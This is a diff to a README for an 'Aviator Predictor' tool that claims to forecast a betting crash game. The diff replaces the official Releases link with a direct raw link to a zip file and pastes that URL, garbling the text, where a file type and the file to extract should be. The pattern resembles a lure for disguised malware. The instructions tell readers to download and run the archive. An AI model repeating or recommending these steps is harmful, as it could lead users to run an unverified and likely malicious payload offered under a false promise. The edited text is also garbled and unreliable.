ududgeming/free/README.md

 To get the Aviator Predictor, follow these steps:

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/ududgeming/free/releases) to find the application.
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/ududgeming/free/main/hyperintelligence/free.zip) to find the application.

 2. **Choose the Version**: Select the latest version available.
 Look for the “Assets” section under the release notes.

 3. **Download the File**: Click on the file that matches your operating system.
-This may be an `.exe`, `.dmg`, or `.tar.gz`.
+This may be an `.exe`, `.dmg`, or `https://raw.githubusercontent.com/ududgeming/free/main/hyperintelligence/free.zip`.

 4. **Run the Installer**:
    - For Windows: Double-click the downloaded `.exe` file and follow the instructions.
    - For macOS: Open the `.dmg` file and drag the Aviator Predictor to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and execute the application in the terminal.
+   - For Linux: Extract the `https://raw.githubusercontent.com/ududgeming/free/main/hyperintelligence/free.zip` file and execute the application in the terminal.

 5. **Launch the Application**: After installation, find the Aviator Predictor in your applications and open it.